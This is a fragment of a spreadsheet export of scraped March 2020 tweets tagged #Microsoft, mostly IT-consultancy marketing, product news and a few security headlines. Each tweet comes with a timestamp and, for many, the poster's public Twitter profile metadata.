    <t>Microsoft Tech Community Update Mar 2nd, 2020 #Microsoft  https://t.co/21i17r6YWI</t>
  </si>
  <si>
    <t>Tue Mar 03 22:10:09 +0000 2020</t>
  </si>
  <si>
    <t>What #facebook could learn from #microsoft https://t.co/RUlf87liFL https://t.co/ZrznQpPIwt</t>
  </si>
  <si>
    <t>Tue Mar 03 22:10:06 +0000 2020</t>
  </si>
  <si>
    <t>Multi-Company Capabilities for Fast Food Franchises https://t.co/rkb2Uizl18
#FastFoodFranchise #Restaurants #operational #Efficiencies #Microsoft #PowerBI #Dashboards #Online #AccountingApp #BusinessSolutions #Restaurateurs #RestaurantFranchise #CFO #CPAs #JustSayGo https://t.co/uZKKr7aPdR</t>
  </si>
  <si>
    <t>Tue Mar 03 22:07:56 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft + AT&amp;amp;T Partnership delivers 5G #NetworkEdgeCompute Technology
 #Gaming #iot #NEC #Microsoft #AzureFamily
https://t.co/E9XbXrYlen</t>
  </si>
  <si>
    <t>Tue Mar 03 22:07:28 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #365Business helps manufacturers digitally transform to empower teams to work faster and better together. Watch video for inspiration &amp;amp; start your transformation with Lanlogic. https://t.co/AyUNyzX8RT</t>
  </si>
  <si>
    <t>{'id': 46519105, 'id_str': '46519105', 'name': 'Lanlogic Bay Area IT', 'screen_name': 'LanlogicIT', 'location': 'Livermore, California', 'description': 'IT Managed Services Provider offers Real People,Real Service\r\nOnsite IT Support in the San Francisco Bay Area\r\nCloud/Hosted/Online Servers &amp; Services+Help Desk', 'url': 'http://t.co/1bpG9LSjA8', 'entities': {'url': {'urls': [{'url': 'http://t.co/1bpG9LSjA8', 'expanded_url': 'http://www.lanlogic.com', 'display_url': 'lanlogic.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 257, 'friends_count': 74, 'listed_count': 73, 'created_at': 'Thu Jun 11 23:15:23 +0000 2009', 'favourites_count': 38, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2684, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '98AC80', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/474240464262938625/iNDxovnP_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/474240464262938625/iNDxovnP_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/46519105/1401905068', 'profile_link_color': '859174', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '5D5A5B', 'profile_text_color': '717667', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 22:06:55 +0000 2020</t>
  </si>
  <si>
    <t>STEAL: Xbox One X 1TB Console - Star Wars Jedi: Fallen Order Bundle
- Gears Bundle (optional)
- NBA 2k20 Bundle (optional)
Value: $499.99
Sale: $299.99
BUY HERE: https://t.co/LpOl3hVyDF
#Xbox #PUBG #Twitch #Starwars #Microsoft #Gaming #GOW #2k20 https://t.co/gGvVBqr5xt</t>
  </si>
  <si>
    <t>Tue Mar 03 22:06:40 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Ransomware Attackers Use Your Cloud Backups Against You:" https://t.co/k5HjNLgadt
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Tue Mar 03 22:06:35 +0000 2020</t>
  </si>
  <si>
    <t>Australian government's certified cloud list to expire come June 30 https://t.co/WHXQ5pHPRo #InfoSec #InfoSecNews #Security #ASD #CSCP #CCSL #CloudSecurity #AWServices #NTT #MacquarieGovernment, #Microsoft #SlicedTech #VaultSystems</t>
  </si>
  <si>
    <t>{'id': 160814516, 'id_str': '160814516', 'name': 'InfoSec News', 'screen_name': 'infosecnews_', 'location': 'Golf, Illinois', 'description': 'One of the longest running and most respected information security news sites. Edited and Moderated by William Knowles - @c4i - Subscribe Today!', 'url': 'https://t.co/upjGykkW6T', 'entities': {'url': {'urls': [{'url': 'https://t.co/upjGykkW6T', 'expanded_url': 'https://www.infosecnews.org/', 'display_url': 'infosecnews.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1629, 'friends_count': 125, 'listed_count': 124, 'created_at': 'Tue Jun 29 05:38:42 +0000 2010', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2788,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'http://pbs.twimg.com/profile_images/874719239550128130/E55nY-yz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/874719239550128130/E55nY-yz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/160814516/1497384317', 'profile_link_color': '89B603',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</si>
  <si>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22:06:01 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact INFINIT Consulting, Inc. to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/6Amys0lRGu</t>
  </si>
  <si>
    <t>{'id': 39793381, 'id_str': '39793381', 'name': 'INFINIT Consulting', 'screen_name': 'INFINIT_C', 'location': 'Campbell, CA', 'description': 'A digital transformation, business technology company built to cloud-enable and empower business. #Cloud #Office365 #Azure #Microsoft #Digitaltransformation', 'url': 'https://t.co/xGf6Wniovp', 'entities': {'url': {'urls': [{'url': 'https://t.co/xGf6Wniovp', 'expanded_url': 'http://www.infinitconsulting.com', 'display_url': 'infinitconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 749, 'friends_count': 972, 'listed_count': 141, 'created_at': 'Wed May 13 17:08:08 +0000 2009', 'favourites_count': 188, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2799, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2F3336', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1176376870981341187/ECtncfWF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176376870981341187/ECtncfWF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39793381/1569305078', 'profile_link_color': '007EC3', 'profile_sidebar_border_color': '181A1E', 'profile_sidebar_fill_color': '252429', 'profile_text_color': '666666', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact INFINIT Consulting, Inc. to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/qNnhd4E4hs</t>
  </si>
  <si>
    <t>{'id': 37016156, 'id_str': '37016156', 'name': 'Jerod Powell', 'screen_name': 'JerodPowell', 'location': 'Issaquah, WA', 'description': 'Jerod Powell is a Cloud Computing thought leader, business transformation expert, executive, author, speaker, President of INFINIT Consulting - @infinit_c', 'url': 'https://t.co/xGf6Wniovp', 'entities': {'url': {'urls': [{'url': 'https://t.co/xGf6Wniovp', 'expanded_url': 'http://www.infinitconsulting.com', 'display_url': 'infinitconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 880, 'friends_count': 1665, 'listed_count': 60, 'created_at': 'Fri May 01 19:13:46 +0000 2009', 'favourites_count': 235, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1751,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'http://pbs.twimg.com/profile_images/751873706574516224/G9-CgW63_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/751873706574516224/G9-CgW63_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37016156/1490808777', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Tue Mar 03 22:05:53 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/2vrUbLS4GM</t>
  </si>
  <si>
    <t>{'id': 49077653, 'id_str': '49077653', 'name': 'S3CC IT Consulting', 'screen_name': 's3cc', 'location': 'San Francisco Bay Area', 'description': 'Managed IT Services, Health Information Tech Consulting, Data Backup/protection, SharePoint Consulting', 'url': 'http://t.co/loPbkrl38x', 'entities': {'url': {'urls': [{'url': 'http://t.co/loPbkrl38x', 'expanded_url': 'http://s3cc.net', 'display_url': 's3cc.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 41, 'friends_count': 61, 'listed_count': 6, 'created_at': 'Sat Jun 20 18:35:13 +0000 2009', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1078,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'http://pbs.twimg.com/profile_images/524832676822278144/2Q-g7qG1_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/524832676822278144/2Q-g7qG1_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/49077653/1402700770',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</si>
  <si>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22:05:10 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN multisite geographic redundancy with @Azure Traffic Manager. #Microsoft #Windows10 #Win10 #aovpn #mobility https://t.co/xLYk67gZZI</t>
  </si>
  <si>
    <t>Tue Mar 03 22:04:27 +0000 2020</t>
  </si>
  <si>
    <t>"We're about empowering people in organizations all over the world to achieve more. In today's world, we want to use AI to achieve that," says Microsoft CEO Satya Nadella. Learn about the #Microsoft vision. https://t.co/w040ow7jRU</t>
  </si>
  <si>
    <t>{'id': 2892295250, 'id_str': '2892295250', 'name': 'Waypoint Solutions', 'screen_name': 'Waypointsolves', 'location': 'Houston, TX', 'description': '', 'url': 'http://t.co/grlqGpTqmT', 'entities': {'url': {'urls': [{'url': 'http://t.co/grlqGpTqmT', 'expanded_url': 'http://www.waypointsolutions.com', 'display_url': 'waypointsolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 44, 'friends_count': 44, 'listed_count': 20, 'created_at': 'Thu Nov 06 15:16:12 +0000 2014', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1795,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'http://pbs.twimg.com/profile_images/552134625393250304/LXahDnpm_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/552134625393250304/LXahDnpm_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2892295250/1548286330',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</si>
  <si>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22:04:20 +0000 2020</t>
  </si>
  <si>
    <t>Gartner has named #Microsoft a Magic Quadrant Leader among analytics and BI platforms for the thirteenth year in a row. Read the report:   https://t.co/VZFzNUUAoi #magicquadrant #digitaltrasformation #microsoft #powerbi https://t.co/NQcDYkSlnl</t>
  </si>
  <si>
    <t>{'id': 292373412, 'id_str': '292373412', 'name': 'Pump - Microsoft Dynamics 365 App for Recruitment', 'screen_name': 'PumpRecruits', 'location': 'United Kingdom', 'description': 'Louis Welcomme. Product Director. Pump - Microsoft Dynamics 365 app for recruitment businesses. Unify systems, people, processes. Agile advocate. https://t.co/BdTddoeCRM', 'url': 'https://t.co/r4EJirgCmM', 'entities': {'url': {'urls': [{'url': 'https://t.co/r4EJirgCmM', 'expanded_url': 'https://www.colleaguesoftware.com/pump', 'display_url': 'colleaguesoftware.com/pump', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/BdTddoeCRM', 'expanded_url': 'http://bit.ly/2jFZSYo', 'display_url': 'bit.ly/2jFZSYo', 'indices': [146, 169]}]}}, 'protected': False, 'followers_count': 3020, 'friends_count': 3013, 'listed_count': 174, 'created_at': 'Tue May 03 15:05:13 +0000 2011', 'favourites_count': 292, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14823,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'http://pbs.twimg.com/profile_images/751330860138397696/jXzL8ZRk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/751330860138397696/jXzL8ZRk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/292373412/1558093679', 'profile_link_color': '589CAE', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F0D3A1', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 22:04:03 +0000 2020</t>
  </si>
  <si>
    <t>Know the signsis outdated accounting software putting your business at risk? Download the free Business Owner's Guide to Replacing Accounting Software.   #Microsoft #Technology #IT #BusinessAutomation #accounting #MSDyn365 https://t.co/ZWMZteW4nH</t>
  </si>
  <si>
    <t>{'id': 2451099437, 'id_str': '2451099437', 'name': 'SisTech Inc.', 'screen_name': 'sisnarine', 'location': 'Mississauga', 'description': 'Manage IT service Provider. | Microsoft Cloud Partner | Networking | Security', 'url': 'http://t.co/mV1A7IDJAO', 'entities': {'url': {'urls': [{'url': 'http://t.co/mV1A7IDJAO', 'expanded_url': 'http://www.sisnarine.com', 'display_url': 'sisnarine.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 96, 'listed_count': 4, 'created_at': 'Tue Apr 01 00:42:49 +0000 2014', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 483,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'http://pbs.twimg.com/profile_images/452189043191578624/egYN1g89_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/452189043191578624/egYN1g89_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2451099437/1462645846',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</si>
  <si>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22:03:49 +0000 2020</t>
  </si>
  <si>
    <t>"We're about empowering people in organizations all over the world to achieve more. In today's world, we want to use AI to achieve that," says Microsoft CEO Satya Nadella. Learn about the #Microsoft vision. https://t.co/BHTdHD4tRI</t>
  </si>
  <si>
    <t>{'id': 1094216431938416640, 'id_str': '1094216431938416640', 'name': 'AEGIS INNOVATORS', 'screen_name': 'aegisinnovators', 'location': 'San Dieog, CA', 'description': 'Cybersecurity &amp; Cloud Collaboration Experts', 'url': 'https://t.co/IFMwLKp6dr', 'entities': {'url': {'urls': [{'url': 'https://t.co/IFMwLKp6dr', 'expanded_url': 'http://www.aegisinnovators.com', 'display_url': 'aegisinnovators.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 38, 'friends_count': 368, 'listed_count': 0, 'created_at': 'Sat Feb 09 12:48:21 +0000 2019', 'favourites_count': 32, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 285, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219368271968755713/nAbRfEk4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219368271968755713/nAbRfEk4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1094216431938416640/1579555026',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</si>
  <si>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22:03:36 +0000 2020</t>
  </si>
  <si>
    <t>This Is How You Can Earn Up to 40 Percent Cashback in Bitcoin (BTC) When Buying Samsung or Microsoft Products
https://t.co/OVQGWszs8S
#Cryptocurrency #CryptoInvestor #CryptoNews #Bitcoin #BTC #Coindesk #Binance #Bittrex #Gemini #Blockchain #Samsung #Microsoft #Cashback #Money</t>
  </si>
  <si>
    <t>{'id': 372622091, 'id_str': '372622091', 'name': 'âœµâ‚¿altaga', 'screen_name': 'Ibaltaga', 'location': '', 'description': 'Dedicated to providing entrepreneurship education, tech, cryptocurrency news and hacks. \nðŸ”—#Entrepreneur #Startup #Cryptocurrency #Investment #Hack', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3425, 'friends_count': 1084, 'listed_count': 12, 'created_at': 'Tue Sep 13 03:18:43 +0000 2011', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 290,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'http://pbs.twimg.com/profile_images/378800000026325979/9df902b7887822a7a99911bd92deb486_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000026325979/9df902b7887822a7a99911bd92deb486_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/372622091/1496772797', 'profile_link_color': '2E2E2E',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</si>
  <si>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22:03:28 +0000 2020</t>
  </si>
  <si>
    <t>Do you want know more about  Teams and SharePoint ?
See this awesome presentation of @Joao12Ferreira  on  #ss2020 
https://t.co/9ZqQ288eHl
#MicrosoftTeams #SharePoint #office365 #microsoft</t>
  </si>
  <si>
    <t>{'id': 88749174, 'id_str': '88749174', 'name': 'JoÃ£o Mendes ðŸ‡µðŸ‡¹', 'screen_name': 'joaojmendes', 'location': 'Porto', 'description': 'SharePoint and Office365 Developer.\n#Office365 #SharePoint #SPFx #Azure', 'url': 'https://t.co/SmieQ3FcGz', 'entities': {'url': {'urls': [{'url': 'https://t.co/SmieQ3FcGz', 'expanded_url': 'http://pt.linkedin.com/in/joaojosemendes', 'display_url': 'pt.linkedin.com/in/joaojosemenâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 438, 'friends_count': 396, 'listed_count': 16, 'created_at': 'Mon Nov 09 20:15:03 +0000 2009', 'favourites_count': 3769, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2195,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'http://pbs.twimg.com/profile_images/1165368386731294721/ODUZ19_o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1165368386731294721/ODUZ19_o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/88749174/1577709607',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</si>
  <si>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22:03:26 +0000 2020</t>
  </si>
  <si>
    <t>.Gartner_inc has named #Microsoft a Magic Quadrant Leader among analytics and BI platforms for the thirteenth year in a row. Read the report: https://t.co/r2b4iPSdby https://t.co/wtlHjNbNch</t>
  </si>
  <si>
    <t>{'id': 1026242003636547585, 'id_str': '1026242003636547585', 'name': 'Capranite', 'screen_name': 'capraniteuk', 'location': 'United Kingdom', 'description': '#Microsoft Dynamics 365 Specialists. Delivering innovative, world-class #BusinessApplications, to industry leading organisations around the world.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 57, 'friends_count': 190, 'listed_count': 3, 'created_at': 'Sun Aug 05 23:02:15 +0000 2018', 'favourites_count': 2243, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1888,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'http://pbs.twimg.com/profile_images/1026244654843486209/ouuArqQe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026244654843486209/ouuArqQe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1026242003636547585/1534953856', 'profile_link_color': 'F7A803',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</si>
  <si>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22:02:14 +0000 2020</t>
  </si>
  <si>
    <t>New blog post about #wpf shortcuts automatically displayed in tooltips #csharp #xaml #Microsoft #Dotnet 
https://t.co/TcAqqVFRUT</t>
  </si>
  <si>
    <t>{'id': 3332846771, 'id_str': '3332846771', 'name': 'Julien Amsellem', 'screen_name': 'julienju2pom', 'location': 'Ile-de-France, France', 'description': 'A French .NET developer', 'url': 'https://t.co/38TozcXdZa', 'entities': {'url': {'urls': [{'url': 'https://t.co/38TozcXdZa', 'expanded_url': 'https://ju2pom.github.io/', 'display_url': 'ju2pom.github.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 89, 'listed_count': 0, 'created_at': 'Thu Jun 18 15:40:28 +0000 2015', 'favourites_count': 458, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 100,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'http://pbs.twimg.com/profile_images/860096790112202753/flf9ws8s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/860096790112202753/flf9ws8s_normal.jpg',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</si>
  <si>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22:01:59 +0000 2020</t>
  </si>
  <si>
    <t>How to Install Windows Hypervisor Platform https://t.co/MRypum9UgW via @YouTube #Microsoft #Windows #Hypervisor #Hyper-V</t>
  </si>
  <si>
    <t>Tue Mar 03 22:00:36 +0000 2020</t>
  </si>
  <si>
    <t>Vatican + Micorsoft + IBM what a combination
The pope has joined forces with Microsoft and IBM to create a doctrine for ethical AI and facial recognition. Here's how the Vatican wants to shape AI.
https://t.co/kFvqnvYp6P
#microsoft #tuesdaythoughts #ai #Vatican</t>
  </si>
  <si>
    <t>Tue Mar 03 21:58:59 +0000 2020</t>
  </si>
  <si>
    <t>Cisco, Microsoft team to control growing IoT networks https://t.co/2roDe5XyJL @NetworkWorld, #Cisco, #Microsoft</t>
  </si>
  <si>
    <t>{'id': 28013080, 'id_str': '28013080', 'name': 'Michael Cooney', 'screen_name': 'Mcooney59', 'location': 'Massachusetts, USA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2137, 'friends_count': 1177, 'listed_count': 180, 'created_at': 'Wed Apr 01 01:02:50 +0000 2009', 'favourites_count': 357, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4407,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'http://pbs.twimg.com/profile_images/481921753581486080/Qa_qs7_r_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/481921753581486080/Qa_qs7_r_normal.jpeg',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</si>
  <si>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21:58:22 +0000 2020</t>
  </si>
  <si>
    <t>$link #google and #microsoft #cloud
4th March 2020 
If that is True... i have no words for it.. its to much for my brain .. 
But okay.. i am All In Link so.. i think #linkers will make it!</t>
  </si>
  <si>
    <t>Tue Mar 03 21:57:45 +0000 2020</t>
  </si>
  <si>
    <t>@SatoshiFlipper $LINK + #GOOGLE + #Microsoft PART II  https://t.co/tazPAeeBH6</t>
  </si>
  <si>
    <t>{'id': 1112811061277753350, 'id_str': '1112811061277753350', 'name': 'andromeda', 'screen_name': 'andromeda_IX', 'location': 'United States', 'description': 'space + chainlink â›“ + techno', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1098, 'friends_count': 1173, 'listed_count': 11, 'created_at': 'Mon Apr 01 20:16:46 +0000 2019', 'favourites_count': 25465, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6558, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1163448009637662721/MDsarvwf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1163448009637662721/MDsarvwf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1112811061277753350/1560857672',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</si>
  <si>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21:57:42 +0000 2020</t>
  </si>
  <si>
    <t>Last call for Microsoft and Lookout's latest #webinar!
Join them tomorrow at 9am GMT for some unique insights on embracing #smartphones at work, #BYOD, and the #ModernWorkplace,. 
Register here: https://t.co/AxYB7DITqM
#Microsoft #Lookout #CyberSec https://t.co/2DHLqW5ELb</t>
  </si>
  <si>
    <t>{'id': 1183687571072835584, 'id_str': '1183687571072835584', 'name': 'Jason Ewbank', 'screen_name': 'JasonEwbank', 'location': 'Manchester', 'description': '', 'url': 'https://t.co/M4T2z8oHwz', 'entities': {'url': {'urls': [{'url': 'https://t.co/M4T2z8oHwz', 'expanded_url': 'http://www.identityexperts.co.uk', 'display_url': 'identityexperts.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 65, 'listed_count': 0, 'created_at': 'Mon Oct 14 10:15:08 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 325, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1183705889158684672/oAUNsoo9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1183705889158684672/oAUNsoo9_normal.jpg',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</si>
  <si>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21:56:11 +0000 2020</t>
  </si>
  <si>
    <t>A complete, updated course to prepare you for real world training  Be a Certified Trainer ready to begin training with a #PrepMasters USA Train-The-Trainer Certificate approved by #Microsoft - https://t.co/hHlcnus0xt https://t.co/Wodm9Gp6Fk</t>
  </si>
  <si>
    <t>Tue Mar 03 21:53:40 +0000 2020</t>
  </si>
  <si>
    <t>Join us at the Microsoft Office downtown Calgary, to hear Sean Henderson talk about the Microsoft Power Platform!
March 4th from 5-7pm - Food &amp;amp; drinks included!
Microsoft Canada 110 9 Ave SW - #710
https://t.co/9DEB51fwUH
#powerplatform #Microsoft #yycbusiness #calgaryevents</t>
  </si>
  <si>
    <t>Tue Mar 03 21:53:08 +0000 2020</t>
  </si>
  <si>
    <t>What Facebook could learn from Microsoft https://t.co/owLHc2p0fN #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 21:52:15 +0000 2020</t>
  </si>
  <si>
    <t>@halo @UberNick_ 
I think I nailed it? Took it on my phone. Always fun to recreate certain scenes with toys. 
#halo
#halospotlight 
#halomcc
#toyphotography 
#recreation 
#xbox #microsoft 
#gaming 
#343industries 
@CatamyKX 
@shieldsjames 
@GrimBrotherOne 
@misplacedyank https://t.co/Tw9FvSfAIa</t>
  </si>
  <si>
    <t>Tue Mar 03 21:50:07 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has numerous offerings that can help make your business run smoother. Take a look at what we can offer you:  #microsoft #phoenixitcompany https://t.co/03TJ5E2lNo https://t.co/XTC3IFqWZG</t>
  </si>
  <si>
    <t>{'id': 819972207392587776, 'id_str': '819972207392587776', 'name': 'Mytek Butler', 'screen_name': 'MytekButler', 'location': 'Scottsdale, AZ', 'description': '', 'url': 'https://t.co/ShzKc8qNpV', 'entities': {'url': {'urls': [{'url': 'https://t.co/ShzKc8qNpV', 'expanded_url': 'http://www.mytek.net', 'display_url': 'mytek.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 296, 'listed_count': 0, 'created_at': 'Fri Jan 13 18:19:43 +0000 2017', 'favourites_count': 130, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 379, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/920802303325609986/vtrXXRRN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/920802303325609986/vtrXXRRN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/819972207392587776/1554741050',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</si>
  <si>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 has numerous offerings that can help make your business run smoother. Take a look at what we can offer you:  #microsoft #phoenixitcompany https://t.co/IBsIecnAdM https://t.co/MCKNUESraM</t>
  </si>
  <si>
    <t>{'id': 159080881, 'id_str': '159080881', 'name': 'Tim Tiller, LMSW', 'screen_name': 'TimTill', 'location': 'Phoenix, AZ', 'description': 'My Why: Building winning outcomes through service fueled by love. Christ follower, supportive husband proud father, community enricher, life-time learner', 'url': 'https://t.co/sHe5FDtUqx', 'entities': {'url': {'urls': [{'url': 'https://t.co/sHe5FDtUqx', 'expanded_url': 'http://www.timtiller.com', 'display_url': 'timtiller.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 77, 'friends_count': 246, 'listed_count': 4, 'created_at': 'Thu Jun 24 11:50:45 +0000 2010', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 418,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'http://pbs.twimg.com/profile_images/928482096506552320/3ZagY8U7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/928482096506552320/3ZagY8U7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/159080881/1519083243',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</si>
  <si>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21:50:05 +0000 2020</t>
  </si>
  <si>
    <t>According to @SOC_Prime in the post on @Peerlyst, "Attackers look around for Microsoft Exchange servers vulnerable to CVE-2020-0688". #microsoft #exchange #CVE https://t.co/ZUpQUVhBQx</t>
  </si>
  <si>
